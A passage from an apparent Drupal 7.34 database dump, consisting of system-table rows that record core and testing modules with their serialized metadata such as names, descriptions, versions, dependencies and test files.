blogs.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"blog.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/book/book.module','book','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:4:\"Book\";s:11:\"description\";s:66:\"Allows users to create and organize related content in an outline.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"book.test\";}s:9:\"configure\";s:27:\"admin/content/book/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"book.css\";s:21:\"modules/book/book.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/color/color.module','color','module','',1,0,7001,0,'a:12:{s:4:\"name\";s:5:\"Color\";s:11:\"description\";s:70:\"Allows administrators to change the color scheme of compatible themes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"color.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/comment/comment.module','comment','module','',1,0,7009,0,'a:14:{s:4:\"name\";s:7:\"Comment\";s:11:\"description\";s:57:\"Allows users to comment on and discuss published content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"text\";}s:5:\"files\";a:2:{i:0;s:14:\"comment.module\";i:1;s:12:\"comment.test\";}s:9:\"configure\";s:21:\"admin/content/comment\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:11:\"comment.css\";s:27:\"modules/comment/comment.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/contact/contact.module','contact','module','',1,0,7003,0,'a:13:{s:4:\"name\";s:7:\"Contact\";s:11:\"description\";s:61:\"Enables the use of both personal and site-wide contact forms.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"contact.test\";}s:9:\"configure\";s:23:\"admin/structure/contact\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/contextual/contextual.module','contextual','module','',1,0,0,0,'a:12:{s:4:\"name\";s:16:\"Contextual links\";s:11:\"description\";s:75:\"Provides contextual links to perform actions related to elements on a page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"contextual.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/dashboard/dashboard.module','dashboard','module','',1,0,0,0,'a:13:{s:4:\"name\";s:9:\"Dashboard\";s:11:\"description\";s:136:\"Provides a dashboard page in the administrative interface for organizing administrative tasks and tracking information within your site.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:5:\"files\";a:1:{i:0;s:14:\"dashboard.test\";}s:12:\"dependencies\";a:1:{i:0;s:5:\"block\";}s:9:\"configure\";s:25:\"admin/dashboard/customize\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/dblog/dblog.module','dblog','module','',1,1,7002,0,'a:12:{s:4:\"name\";s:16:\"Database logging\";s:11:\"description\";s:47:\"Logs and records system events to the database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"dblog.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/field.module','field','module','',1,0,7003,0,'a:14:{s:4:\"name\";s:5:\"Field\";s:11:\"description\";s:57:\"Field API to add fields to entities like nodes and users.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:4:{i:0;s:12:\"field.module\";i:1;s:16:\"field.attach.inc\";i:2;s:20:\"field.info.class.inc\";i:3;s:16:\"tests/field.test\";}s:12:\"dependencies\";a:1:{i:0;s:17:\"field_sql_storage\";}s:8:\"required\";b:1;s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:15:\"theme/field.css\";s:29:\"modules/field/theme/field.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/field_sql_storage/field_sql_storage.module','field_sql_storage','module','',1,0,7002,0,'a:13:{s:4:\"name\";s:17:\"Field SQL storage\";s:11:\"description\";s:37:\"Stores field data in an SQL database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:22:\"field_sql_storage.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/list/list.module','list','module','',1,0,7002,0,'a:12:{s:4:\"name\";s:4:\"List\";s:11:\"description\";s:69:\"Defines list field types. Use with Options to create selection lists.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:2:{i:0;s:5:\"field\";i:1;s:7:\"options\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/list.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/list/tests/list_test.module','list_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"List test\";s:11:\"description\";s:41:\"Support module for the List module tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/field/modules/number/number.module','number','module','',1,0,0,0,'a:12:{s:4:\"name\";s:6:\"Number\";s:11:\"description\";s:28:\"Defines numeric field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:11:\"number.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/options/options.module','options','module','',1,0,0,0,'a:12:{s:4:\"name\";s:7:\"Options\";s:11:\"description\";s:82:\"Defines selection, check box and radio button widgets for text and numeric fields.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:12:\"options.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/text/text.module','text','module','',1,0,7000,0,'a:14:{s:4:\"name\";s:4:\"Text\";s:11:\"description\";s:32:\"Defines simple text field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:9:\"text.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}'),('modules/field/tests/field_test.module','field_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:14:\"Field API Test\";s:11:\"description\";s:39:\"Support module for the Field API tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:5:\"files\";a:1:{i:0;s:21:\"field_test.entity.inc\";}s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field_ui/field_ui.module','field_ui','module','',1,0,0,0,'a:12:{s:4:\"name\";s:8:\"Field UI\";s:11:\"description\";s:33:\"User interface for the Field API.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:13:\"field_ui.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/file/file.module','file','module','',1,0,0,0,'a:12:{s:4:\"name\";s:4:\"File\";s:11:\"description\";s:26:\"Defines a file field type.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/file.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/file/tests/file_module_test.module','file_module_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"File test\";s:11:\"description\";s:53:\"Provides hooks for testing File module functionality.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/filter/filter.module','filter','module','',1,0,7010,0,'a:14:{s:4:\"name\";s:6:\"Filter\";s:11:\"description\";s:43:\"Filters content in preparation for display.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"filter.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:28:\"admin/config/content/formats\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/forum/forum.module','forum','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:5:\"Forum\";s:11:\"description\";s:27:\"Provides discussion forums.\";s:12:\"dependencies\";a:2:{i:0;s:8:\"taxonomy\";i:1;s:7:\"comment\";}s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"forum.test\";}s:9:\"configure\";s:21:\"admin/structure/forum\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:9:\"forum.css\";s:23:\"modules/forum/forum.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/help/help.module','help','module','',1,0,0,0,'a:12:{s:4:\"name\";s:4:\"Help\";s:11:\"description\";s:35:\"Manages the display of online help.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"help.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/image/image.module','image','module','',1,0,7005,0,'a:15:{s:4:\"name\";s:5:\"Image\";s:11:\"description\";s:34:\"Provides image manipulation tools.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"file\";}s:5:\"files\";a:1:{i:0;s:10:\"image.test\";}s:9:\"configure\";s:31:\"admin/config/media/image-styles\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}'),('modules/image/tests/image_module_test.module','image_module_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Image test\";s:11:\"description\";s:69:\"Provides hook implementations for testing Image module functionality.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:24:\"image_module_test.module\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/locale/locale.module','locale','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:6:\"Locale\";s:11:\"description\";s:119:\"Adds language handling functionality and enables the translation of the user interface to languages other than English.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"locale.test\";}s:9:\"configure\";s:30:\"admin/config/regional/language\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/locale/tests/locale_test.module','locale_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Locale Test\";s:11:\"description\";s:42:\"Support module for the locale layer tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/menu/menu.module','menu','module','',1,0,7003,0,'a:13:{s:4:\"name\";s:4:\"Menu\";s:11:\"description\";s:60:\"Allows administrators to customize the site navigation menu.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"menu.test\";}s:9:\"configure\";s:20:\"admin/structure/menu\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/node/node.module','node','module','',1,0,7014,0,'a:15:{s:4:\"name\";s:4:\"Node\";s:11:\"description\";s:66:\"Allows content to be submitted to the site and displayed on pages.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"node.module\";i:1;s:9:\"node.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:21:\"admin/structure/types\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"node.css\";s:21:\"modules/node/node.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/node/tests/node_access_test.module','node_access_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:24:\"Node module access tests\";s:11:\"description\";s:43:\"Support module for node permission testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/node/tests/node_test.module','node_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:17:\"Node module tests\";s:11:\"description\";s:40:\"Support module for node related testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/node/tests/node_test_exception.module','node_test_exception','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:27:\"Node module exception tests\";s:11:\"description\";s:50:\"Support module for node related exception testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/openid/openid.module','openid','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:6:\"OpenID\";s:11:\"description\";s:48:\"Allows users to log into your site using OpenID.\";s:7:\"version\";s:4:\"7.34\";s:7:\"package\";s:4:\"Core\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"openid.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/openid/tests/openid_test.module','openid_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:21:\"OpenID dummy provider\";s:11:\"description\";s:33:\"OpenID provider used for testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:6:\"openid\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/overlay/overlay.module','overlay','module','',1,1,0,0,'a:12:{s:4:\"name\";s:7:\"Overlay\";s:11:\"description\";s:59:\"Displays the Drupal administration interface in an overlay.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/path/path.module','path','module','',1,0,0,0,'a:13:{s:4:\"name\";s:4:\"Path\";s:11:\"description\";s:28:\"Allows users to rename URLs.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"path.test\";}s:9:\"configure\";s:24:\"admin/config/search/path\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/php/php.module','php','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:10:\"PHP filter\";s:11:\"description\";s:50:\"Allows embedded PHP code/snippets to be evaluated.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:8:\"php.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/poll/poll.module','poll','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:4:\"Poll\";s:11:\"description\";s:95:\"Allows your site to capture votes on different topics in the form of multiple choice questions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"poll.test\";}s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"poll.css\";s:21:\"modules/poll/poll.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/profile/profile.module','profile','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:7:\"Profile\";s:11:\"description\";s:36:\"Supports configurable user profiles.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"profile.test\";}s:9:\"configure\";s:27:\"admin/config/people/profile\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/rdf/rdf.module','rdf','module','',1,0,0,0,'a:12:{s:4:\"name\";s:3:\"RDF\";s:11:\"description\";s:148:\"Enriches your content with metadata to let other applications (e.g. search engines, aggregators) better understand its relationships and attributes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:8:\"rdf.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/rdf/tests/rdf_test.module','rdf_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"RDF module tests\";s:11:\"description\";s:38:\"Support module for RDF module testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/search/search.module','search','module','',1,0,7000,0,'a:14:{s:4:\"name\";s:6:\"Search\";s:11:\"description\";s:36:\"Enables site-wide keyword searching.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:19:\"search.extender.inc\";i:1;s:11:\"search.test\";}s:9:\"configure\";s:28:\"admin/config/search/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"search.css\";s:25:\"modules/search/search.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/search/tests/search_embedded_form.module','search_embedded_form','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:20:\"Search embedded form\";s:11:\"description\";s:59:\"Support module for search module testing of embedded forms.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/search/tests/search_extra_type.module','search_extra_type','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"Test search type\";s:11:\"description\";s:41:\"Support module for search module testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/shortcut/shortcut.module','shortcut','module','',1,0,0,0,'a:13:{s:4:\"name\";s:8:\"Shortcut\";s:11:\"description\";s:60:\"Allows users to manage customizable lists of shortcut links.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:13:\"shortcut.test\";}s:9:\"configure\";s:36:\"admin/config/user-interface/shortcut\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/simpletest.module','simpletest','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:7:\"Testing\";s:11:\"description\";s:53:\"Provides a framework for unit and functional 